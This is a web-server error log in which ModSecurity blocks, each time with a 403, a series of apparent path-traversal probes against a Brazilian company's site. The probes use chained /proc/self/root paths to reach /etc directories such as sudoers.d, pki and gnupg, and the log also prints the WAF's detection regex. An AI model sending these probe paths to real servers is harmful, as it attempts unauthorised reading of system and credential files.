https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:47:31.453167 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.241.46:35744] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6cv9ocpUE4ed4uDwU1QAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:47:39.028979 2026] [:error] [pid 10651:tid 140411599251200] [client 74.7.241.46:35748] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6e7ysWC90G-1nBrBl7AAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:47:42.547280 2026] [:error] [pid 29802:tid 140411582465792] [client 74.7.243.203:35696] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6fs_BxrYCr4hPDw8K8AAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:47:47.886516 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.241.46:54594] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6g7ysWC90G-1nBrBl8gAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:47:49.217531 2026] [:error] [pid 29507:tid 140411658000128] [client 74.7.241.46:33956] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6hUr9dMAiw-8KANNpkgAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:48:08.755715 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.241.46:33966] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6mLABkC4fWIHEf8EZSgAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:48:10.147617 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.241.46:57338] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6mrABkC4fWIHEf8EZTQAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:48:20.343785 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.241.46:57344] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6pLABkC4fWIHEf8EZXAAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:48:21.638031 2026] [:error] [pid 15568:tid 140411548894976] [client 74.7.241.46:51904] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6paQpVkWug9HeOt9U7wAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:48:47.809269 2026] [:error] [pid 29802:tid 140411725141760] [client 74.7.241.46:51918] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6vs_BxrYCr4hPDw8LEgAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:48:49.152682 2026] [:error] [pid 15568:tid 140411691570944] [client 74.7.241.46:34330] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6waQpVkWug9HeOt9U8wAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:48:50.457974 2026] [:error] [pid 14895:tid 140411725141760] [client 74.7.241.46:34338] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6wlajLEzk2WiQ-10ztQAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:48:51.852971 2026] [:error] [pid 15061:tid 140411666392832] [client 74.7.241.46:34346] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6w6TCbgAP5jq5TehMLAAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:48:53.189125 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.241.46:34348] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6xf9ocpUE4ed4uDwU2gAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:02.395776 2026] [:error] [pid 29802:tid 140411624429312] [client 74.7.241.46:34362] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6zs_BxrYCr4hPDw8LJwAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:03.780048 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.241.46:53622] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6z9SswJuvopo3lOiBdAAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:05.611255 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.241.46:53638] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh60bABkC4fWIHEf8EZYwAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:06.990029 2026] [:error] [pid 14895:tid 140411624429312] [client 74.7.241.46:53650] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh60lajLEzk2WiQ-10zuAAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:11.056071 2026] [:error] [pid 29802:tid 140411557287680] [client 74.7.241.46:46068] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh618_BxrYCr4hPDw8LNgAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:14.699470 2026] [:error] [pid 10651:tid 140411599251200] [client 74.7.241.46:46074] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh62rysWC90G-1nBrBl_QAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:16.058624 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.241.46:46076] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh63LABkC4fWIHEf8EZZQAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
